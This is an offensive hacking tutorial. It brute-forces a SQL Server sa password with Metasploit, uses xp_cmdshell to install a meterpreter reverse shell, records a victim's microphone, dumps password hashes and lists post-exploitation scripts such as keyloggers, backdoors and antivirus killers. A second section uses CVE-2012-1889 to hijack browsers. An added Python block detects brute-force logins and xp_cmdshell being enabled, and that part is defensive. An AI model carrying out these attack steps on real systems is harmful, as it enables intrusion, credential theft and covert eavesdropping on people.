How to Hack Databases: Cracking SQL Server Passwords & Owning the Server
In this tutorial, we'll look at how we can crack the password on the system admin (sa) account on the database, install a meterpreter payload through calling the stored procedure xp_cmdshell, and wreak havoc on their system.
Step 1: Start Metasploit
First, we need to start Metasploit.
Once we have the Metasploit command prompt, we need to define which module we want to use. In past Metasploit tutorials, we've always used exploits, but this one is a bit different. Instead, we will use a scanner among the auxiliary modules that enables us to brute force the sa password. Let's load up mssql_login:
use scanner/mssql/mssql_login
As you can see, Metasploit responds by telling us we have successfully loaded this auxiliary module. Now let's take a look at the options with this module.
show options
Step 2: Set Your Options
In order to run this MS SQL login module, we will need to:
Provide a password file,
Set the RHOSTS, and
Set the number of THREADS we want to run.
BackTrack has a wordlist specially built for MS SQL password hacking with over 57,000 commonly used SQL passwords at /pentest/exploits/fasttrack/bin/wordlist.txt. In this case, our target is at 192.168.1.103, and we will set our THREADS to 20.
Step 3: Brute Force the Database Passwords
Now, we simply need to type exploit and it runs through the password list until it finds the password for the sa account.
exploit
As you can see, after testing over 57,000 passwords (it takes a few minutes, so be patient), it found the password on our sa account of "NullByte". Success! Now we have full sysadmin privileges on the database that we can hopefully convert to full system sysadmin privileges.
Step 4: Grab the xp_cmdshell
Now that we have full sysadmin (sa) on the MS SQL database, we are going to leverage that to full system sysadmin privileges. MS SQL Server has a stored procedure named xp_cmdshell that enables the sa account to gain a system command shell with full system admin rights. If we can invoke that command shell, we may be able to load the payload of our choice on the system and own that system.
Metasploit has an exploit module named windows/mssql/mssql_payload that attempts to do this. Let's load it.
use windows/mssql/mssql_payload
Now, let's check the options for this exploit:
show options
In this case, we will try to load the meterpreter on this system, so let's:
set PAYLOAD windows/meterpreter/reverse_tcp
In addition, we need to set the LPORT, the LHOST, the RHOST and the password we recovered from the sa account above, in this case, "NullByte".
Now, simply type exploit and if all is right with the world, we should get a meterpreter prompt.
Success! We have a meterpreter session!
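From the defender's side, both halves of this procedure leave tracks in the SQL Server ERRORLOG: every failed login is written as an "Error: 18456" line followed by a "Login failed for user '...' ... [CLIENT: ...]" line, and switching xp_cmdshell on with sp_configure is logged as "Configuration option 'xp_cmdshell' changed from 0 to 1". The following is an added example, not code from the original tutorial or from Metasploit; the log lines in SAMPLE_ERRORLOG are constructed to mimic that format, and the threshold and window values are assumptions you would tune for your own instance.

```python
"""Flag sa brute-force bursts and xp_cmdshell being enabled from SQL Server
ERRORLOG lines.  Added example; the sample log below is constructed."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample ERRORLOG.  A real log repeats the "Error: 18456" line
# before every "Login failed" line; it is shown once here for brevity.
SAMPLE_ERRORLOG = """\
2012-06-15 10:30:00.01 Logon       Login failed for user 'appuser'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.1.50]
2012-06-15 10:32:01.12 Logon       Error: 18456, Severity: 14, State: 8.
2012-06-15 10:32:01.12 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.1.10]
2012-06-15 10:32:03.40 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.1.10]
2012-06-15 10:32:05.77 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.1.10]
2012-06-15 10:32:08.03 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.1.10]
2012-06-15 10:32:11.21 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.1.10]
2012-06-15 10:32:15.90 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.1.10]
2012-06-15 10:33:40.55 spid52      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2012-06-15 10:33:40.60 spid52      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
"""

# "<date> <time>.<fraction> <source> <message>" is the ERRORLOG line layout.
LINE_RE = re.compile(r"^(\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\.\d+\s+(\S+)\s+(.*)$")
LOGIN_FAILED_RE = re.compile(r"Login failed for user '([^']*)'.*\[CLIENT: ([^\]]+)\]")
CONFIG_CHANGED_RE = re.compile(r"Configuration option '([^']+)' changed from (\d+) to (\d+)")


def parse_errorlog(text):
    """Return (timestamp, source, message) tuples; skips banner/continuation lines."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S")
        entries.append((ts, m.group(2), m.group(3)))
    return entries


def find_login_bursts(entries, threshold=5, window=timedelta(seconds=60)):
    """Return {(user, client): total_failures} for every (user, client) pair
    that produced at least `threshold` failed logins inside one sliding
    `window`.  Threshold and window are assumed values, tune for your site."""
    failures = defaultdict(list)
    for ts, _src, msg in entries:
        m = LOGIN_FAILED_RE.search(msg)
        if m:
            failures[(m.group(1), m.group(2))].append(ts)
    alerts = {}
    for key, times in failures.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            while times[end] - times[start] > window:
                start += 1  # slide the window forward
            if end - start + 1 >= threshold:
                alerts[key] = len(times)
                break
    return alerts


def find_xp_cmdshell_enabled(entries):
    """Return the timestamps at which 'xp_cmdshell' was changed to 1."""
    hits = []
    for ts, _src, msg in entries:
        m = CONFIG_CHANGED_RE.search(msg)
        if m and m.group(1) == "xp_cmdshell" and m.group(3) == "1":
            hits.append(ts)
    return hits


if __name__ == "__main__":
    log = parse_errorlog(SAMPLE_ERRORLOG)
    for (user, client), n in find_login_bursts(log).items():
        print(f"ALERT: {n} failed logins for '{user}' from {client}")
    for ts in find_xp_cmdshell_enabled(log):
        print(f"ALERT: xp_cmdshell enabled at {ts}")
```

On the sample, the single failure for 'appuser' stays below the threshold, while the six 'sa' failures from one client inside fifteen seconds are reported, as is the xp_cmdshell change. On a production instance you would feed it the output of xp_readerrorlog or the ERRORLOG file itself, and leave xp_cmdshell disabled (its default since SQL Server 2005) unless a specific job needs it.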
Step 5: Wreak Havoc!
Now that we have the meterpreter on this system thanks to the xp_cmdshell stored procedure, we can begin to wreak havoc on this system. Take a look at my list of meterpreter scripts and let's try a few.
First, let's turn on the microphone and listen in on the conversations of the sysadmin and anyone else in the room. Think of it as installing a bug in the room from the old James Bond 007 movies.
meterpreter > run sound_recorder -i 100 -l /etc
This will grab 100 segments of audio of 30 seconds, or about 50 minutes, and save it in the /etc directory. Of course, we can record as much audio as we want. We are only limited by hard drive space.
Step 6: Grab the Hash
Now, let's grab some passwords so that we can log back in whenever we please. Remember, once we have the admin password, we can log in any time with Metasploit's psexec exploit.
meterpreter > hashdump
As you can see, we were able to grab the password hashes from the system.
Please note that new meterpreter scripts are being developed every day. This list attempts to provide you with a complete list of scripts as of this writing. If you find errors or typos, please feel free to post them here, so I can try to correct them as soon as humanly possible.
Script Commands with Brief Descriptions
arp_scanner.rb - Script for performing an ARP scan discovery.
autoroute.rb - Adds a route through the Meterpreter session without having to background the current session.
checkvm.rb - Script for detecting if target host is a virtual machine.
credcollect.rb - Script to harvest credentials found on the host and store them in the database.
domain_list_gen.rb - Script for extracting domain admin account list for use.
dumplinks.rb - Dumplinks parses .lnk files from a user's recent documents folder and Microsoft Office's Recent documents folder, if present. The .lnk files contain time stamps, file locations, including share names, volume serial #s and more. This info may help you target additional systems.
duplicate.rb - Uses a meterpreter session to spawn a new meterpreter session in a different process. A new process allows the session to take "risky" actions that might get the process killed by A/V, giving a meterpreter session to another controller, or start a keylogger on another process.
enum_chrome.rb - Script to extract data from a chrome installation.
enum_firefox.rb - Script for extracting data from Firefox.
enum_logged_on_users.rb - Script for enumerating currently logged-on users and users that have logged in to the system.
enum_powershell_env.rb - Enumerates PowerShell and WSH configurations.
enum_putty.rb - Enumerates Putty connections.
enum_shares.rb - Script for Enumerating shares offered and history of mounted shares.
enum_vmware.rb - Enumerates VMware configurations for VMware products.
event_manager.rb - Show information about Event Logs on the target system and their configuration.
file_collector.rb - Script for searching and downloading files that match a specific pattern.
get_application_list.rb - Script for extracting a list of installed applications and their version.
getcountermeasure.rb - Script for detecting AV, HIPS, third-party firewalls, DEP configuration and Windows Firewall configuration. Also provides the option to kill the processes of detected products and disable the built-in firewall.
get_env.rb - Script for extracting a list of all System and User environment variables.
getfilezillacreds.rb - Script for extracting servers and credentials from Filezilla.
getgui.rb - Script to enable Windows RDP.
get_local_subnets.rb - Get a list of local subnets based on the host's routes.
get_pidgen_creds.rb - Script for extracting configured services with username and passwords.
gettelnet.rb - Checks to see whether telnet is installed.
get_valid_community.rb - Gets a valid community string from SNMP.
getvncpw.rb - Gets the VNC password.
hashdump.rb - Grabs password hashes from the SAM.
hostedit.rb - Script for adding entries in to the Windows Hosts file.
keylogrecorder.rb - Script for running keylogger and saving all the keystrokes.
killav.rb - Terminates nearly every antivirus software on victim.
metsvc.rb - Delete one meterpreter service and start another.
migrate - Moves the meterpreter service to another process.
multicommand.rb - Script for running multiple commands on Windows 2003, Windows Vista, Windows XP and Windows 2008 targets.
multi_console_command.rb - Script for running multiple console commands on a meterpreter session.
multi_meter_inject.rb - Script for injecting a reverse TCP Meterpreter payload into the memory of multiple PIDs; if none is provided, a notepad process will be created and a Meterpreter payload will be injected into each.
multiscript.rb - Script for running multiple scripts on a Meterpreter session.
netenum.rb - Script for ping sweeps on Windows 2003, Windows Vista, Windows 2008 and Windows XP targets using native Windows commands.
packetrecorder.rb - Script for capturing packets in to a PCAP file.
panda2007pavsrv51.rb - This module exploits a privilege escalation vulnerability in Panda Antivirus 2007. Due to insecure permission issues, a local attacker can gain elevated privileges.
persistence.rb - Script for creating a persistent backdoor on a target host.
pml_driver_config.rb - Exploits a privilege escalation vulnerability in Hewlett-Packard's PML Driver HPZ12. Due to an insecure SERVICE_CHANGE_CONFIG DACL permission, a local attacker can gain elevated privileges.
powerdump.rb - Meterpreter script for utilizing purely PowerShell to extract username and password hashes through registry keys. This script requires you to be running as SYSTEM in order to work properly. It has currently been tested on Server 2008 and Windows 7, which install PowerShell by default.
prefetchtool.rb - Script for extracting information from windows prefetch folder.
process_memdump.rb - Script is based on the paper Neurosurgery With Meterpreter.
remotewinenum.rb - This script will enumerate Windows hosts in the target environment, given a username and password or using the credentials under which Meterpreter is running, via the native Windows WMI tool wmic.
scheduleme.rb - Script for automating the most common scheduling tasks during a pentest. This script works with Windows XP, Windows 2003, Windows Vista and Windows 2008.
schelevator.rb - Exploit for Windows Vista/7/2008 Task Scheduler 2.0 privilege escalation. This script exploits the Task Scheduler 2.0 XML 0day exploited by Stuxnet.
schtasksabuse.rb - Meterpreter script for abusing the scheduler service in Windows by scheduling and running a list of commands against one or more targets, using the schtasks command to run them as SYSTEM. This script works with Windows XP, Windows 2003, Windows Vista and Windows 2008.
scraper.rb - The goal of this script is to obtain system information from a victim through an existing Meterpreter session.
screenspy.rb - This script will open an interactive view of remote hosts. You will need Firefox installed on your machine.
screen_unlock.rb - Script to unlock a windows screen. Needs system privileges to run and known signatures for the target system.
screen_dwld.rb - Script that recursively searches for and downloads files matching a given pattern.
service_manager.rb - Script for managing Windows services.
service_permissions_escalate.rb - This script attempts to create a service, then searches through a list of existing services to look for insecure file or configuration permissions that will let it replace the executable with a payload. It will then attempt to restart the replaced service to run the payload. If that fails, the next time the service is started (such as on reboot) the attacker will gain elevated privileges.
sound_recorder.rb - Script for recording, in intervals, the sound captured by a target host's microphone.
srt_webdrive_priv.rb - Exploits a privilege escalation vulnerability in South River Technologies WebDrive.
uploadexec.rb - Script to upload executable file to host.
virtualbox_sysenter_dos - Script to DoS Virtual Box.
virusscan_bypass.rb - Script that kills McAfee VirusScan Enterprise v8.7.0i+ processes.
vnc.rb - Meterpreter script for obtaining a quick VNC session.
webcam.rb - Script to enable and capture images from the host webcam.
win32-sshclient.rb - Script to deploy & run the "plink" commandline ssh-client. Supports only MS-Windows-2k/XP/Vista Hosts.
win32-sshserver.rb - Script to deploy and run OpenSSH on the target machine.
winbf.rb - Function for checking the password policy of the current system. This policy may resemble the policy of other servers in the target environment.
winenum.rb - Enumerates Windows system including environment variables, network interfaces, routing, user accounts, etc
wmic.rb - Script for running WMIC commands on Windows 2003, Windows Vista and Windows XP and Windows 2008 targets.
CVE-2012-1889: Microsoft XML Core Services Vulnerability
A vulnerability in Microsoft XML Core Services 3.0, 4.0, 5.0, and 6.0 allows remote code execution if a user views a specially crafted webpage using Internet Explorer.
An attacker would have no way to force users to visit such a website. Instead, an attacker would have to convince users to visit the website, typically by getting them to click a link in an email message or Instant Messenger message that takes them to the attacker's website.
The vulnerability affects all supported releases of Microsoft Windows, and all supported editions of Microsoft Office 2003 and Microsoft Office 2007. Here you can get the full list.
The vulnerability exists when MSXML attempts to access an object in memory that has not been initialized, which may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the logged-on user.
I am going to demonstrate how to use the Metasploit tool for testing whether your network is vulnerable or not.
Open the Terminal and type "msfupdate" to get the latest Metasploit modules. Once the update is finished, type "msfconsole".
Then type the following command in the console "use exploit/windows/browser/msxml_get_definition_code_exec".
Now we have to know the list of settings available for this exploit module. In order to get the list, you can type "show options" in the console.
Command: set SRVHOST 192.168.56.10 Details: Here 192.168.56.11 is the IP of BackTrack. You can get this IP by simply typing "ifconfig" in the terminal.
Command: set lhost 192.168.56.10
Command: set URIPATH / Details: The path in which our exploit will run.
As usual, we can use the reverse TCP payload for this attack as well. So type the following command in the Metasploit console:
set payload windows/meterpreter/reverse_tcp
Type "exploit" in the console.
Once the victim loads the URL in his IE browser, you will get the following message in your metasploit console:
[*] msxml_get_definition_code_exec - Using msvcrt ROP
[*] msxml_get_definition_code_exec - 10.0.1.79:1564 - Sending html
[*] Sending stage (752128 bytes) to 192.168.56.12
[*] Meterpreter session 1 opened (192.168.56.10:4444 -> 192.168.56.12:1565)
Type "sessions" to list the active sessions. Type "sessions -i 1"; this will open the connection to the session with the id '1' and bring you to Meterpreter.
Type "sysinfo" in the meterpreter to get the system information.